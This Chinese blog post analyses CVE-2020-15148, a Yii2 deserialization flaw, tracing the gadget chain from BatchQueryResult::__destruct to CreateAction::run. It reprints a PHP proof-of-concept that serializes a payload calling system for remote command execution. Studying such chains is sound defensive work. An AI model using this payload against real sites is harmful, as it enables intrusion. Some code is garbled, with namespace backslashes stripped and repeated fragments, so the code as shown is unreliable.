CVE-2020-15148漏洞分析

 更新时间:2023年02月24日 10:25:28   作者:XINO  
这篇文章主要为大家介绍了CVE-2020-15148漏洞分析,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪

基础知识

在学习该漏洞之前我们需要学习一下前置知识来更好的理解该漏洞的产生原因以及如何利用。 我们先来学习一下框架的基本信息以及反序列化漏洞的基本利用过程。

Yii2

Yii是一个基于组件的高性能PHP框架,用于开发大型Web应用。Yii采用严格的OOP编写,并有着完善的库引用以及全面的教程。而CVE-2020-15148则是在其版本YII2.0.38之前的一个反序列化漏洞,该漏洞在调用unserialize时,攻击者可通过构造特定的恶意请求执行任意命令,这也是常见的反序列化漏洞的利用过程。

魔术方法

提到PHP反序列化一定离不开魔术方法,这些方法通常会在达到一些特殊条件后就会执行,举个例子:

__construct() //新建对象时调用

我们编写下面的代码:

当我们执行时new了一个类,这就会调用里面的魔术方法,从而输出语句。当然这只是最简单的魔术方法,下面给大家一个列表来进行参考:

了解完以上知识点后我们开始对该漏洞进行分析。

漏洞分析

首先我们要搭建环境,最好搭建在本地方便调试,源码地址如下:

github.com/yiisoft/yii…

搭建完后我们首先找到漏洞切入点,也就是可能存在威胁的地方,结合上面对魔术方法的分析在 /vendor/yiisoft/yii2/db/BatchQueryResult.php下找到了可能存在漏洞的点,因为里面有个魔术方法在对象销毁时调用:

__destruct()调用了reset()方法,方法里面的$this->_dataReader是可控的:

public function reset()
{
        if ($this->_dataReader !== null) {
            $this->_dataReader->close();
        }

于是思考接下来要如何利用,根据POC的构造,假设我们将_dataReader变成类然后去调用close()方法,若类型没有close()方法,同时还有__call魔术方法,则会调用该魔术方法。我们找到faker/src/Faker/Generator.php:里面存在call方法且调用了foemat方法:

public function format($formatter, $arguments = array())
    {
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }

跟进这里:

$this->getFormatter($formatter)

看到存在可控参数:

public function getFormatter($formatter)
{
        if (isset($this->formatters[$formatter])) { 
            return $this->formatters[$formatter];
        }
        foreach ($this->providers as $provider) {
            if (method_exists($provider, $formatter)) {
                $this->formatters[$formatter] = array($provider, $formatter);
                return $this->formatters[$formatter];
            }
        }

this−>formatters[this - > formatters[this−>formatters[formatter] 有值,就返回其值,回看一下会发现值为:

$formatter='close',$arguments=空

即返回的第一个参数是可控的,我们便可以调用任意的无参方法,这里找到/vendor/yiisoft/yii2/rest/CreateAction.php:

 public function run()
    {
        if ($this->checkAccess) {
            call_user_func($this->checkAccess, $this->id);
        }

this−>checkAccess,this->checkAccess,this−>checkAccess,this->id是可控的,那么就可以执行RCE。利用链如下:

yii\db\BatchQueryResult::__destruct()->Faker\Generator::__call()->yii\rest\CreateAction::run()

这里贴一个大佬们的POC:

<?php
namespace yiirest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'phpinfo();';
        }
    }
}
namespace Faker{
    use yiirestCreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}
namespace yiidb{
    use FakerGenerator;
    class BatchQueryResult{
        private $_dataReader;
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yiidbBatchQueryResult));
}
?>

下面是传入构造好的payload对网站进行请求的结果,可以看到成功进行了命令执行。

结语

今天给大家带来的是CVE-2020-15148漏洞的简单分析,整体看下来还是很简单的,我们需要注意如何调用的魔术方法以及如何进行RCE,有兴趣的小伙伴可以自己去搭建环境进行测试,喜欢本文的朋友希望可以一键三连支持一下。

以上就是CVE-2020-15148漏洞分析的详细内容,更多关于CVE-2020-15148漏洞的资料请关注脚本之家其它相关文章!

相关文章

  • PHP+memcache实现消息队列案例分享

    PHP+memcache实现消息队列案例分享

    现在memcache在服务器缓存应用比较广泛,下面我来介绍memcache实现消息队列等待的一个例子,有需要了解的朋友可参考。
    2014-05-05
  • PHP框架Laravel中实现supervisor执行异步进程的方法

    PHP框架Laravel中实现supervisor执行异步进程的方法

    这篇文章主要给大家介绍了PHP框架Laravel中实现supervisor执行异步进程的方法,文中介绍的非常详细,相信对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
    2017-06-06
  • Codeigniter通过SimpleXML将xml转换成对象的方法

    Codeigniter通过SimpleXML将xml转换成对象的方法

    这篇文章主要介绍了Codeigniter通过SimpleXML将xml转换成对象的方法,涉及Codeigniter操作XML文件的技巧,非常具有实用价值,需要的朋友可以参考下
    2015-03-03
  • Laravel学习笔记之Artisan命令生成自定义模板的方法

    Laravel学习笔记之Artisan命令生成自定义模板的方法

    这篇文章主要介绍了Laravel学习笔记之Artisan命令生成自定义模板的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2018-11-11
  • php实现文件编码批量转换

    php实现文件编码批量转换

    转换文件编码,比如原来是gbk,转换成utf-8的,可以转单个文件也可以转换整个目录的文件,可选是否递归目录
    2014-03-03
  • php实现的mongodb操作类

    php实现的mongodb操作类

    说到php连mongoDB,不得不先介绍一下php的官方手册,网址在:http://us.php.net/manual/en/book.mongo.php,接下来给大家分享一个本人常用的MONGODB的操作类,详见的数据库操作都有了,小伙伴可以参考下。
    2015-05-05
  • Yii视图操作之自定义分页实现方法

    Yii视图操作之自定义分页实现方法

    这篇文章主要介绍了Yii视图操作之自定义分页实现方法,结合实例形式分析了Yii自定义分页的实现步骤与相关技巧,需要的朋友可以参考下
    2016-07-07
  • phpmyadmin在宝塔面板里进不去的解决方案

    phpmyadmin在宝塔面板里进不去的解决方案

    这篇文章主要介绍了phpmyadmin在宝塔面板里进不去的解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2020-07-07
  • Laravel 6 将新增为指定队列任务设置中间件的功能

    Laravel 6 将新增为指定队列任务设置中间件的功能

    这篇文章主要介绍了Laravel 6 将新增为指定队列任务设置中间件的功能,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
    2019-08-08
  • 使用phpunit进行接口自动化测试

    使用phpunit进行接口自动化测试

    下面小编就为大家分享一篇使用phpunit进行接口自动化测试,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2018-03-03

最新评论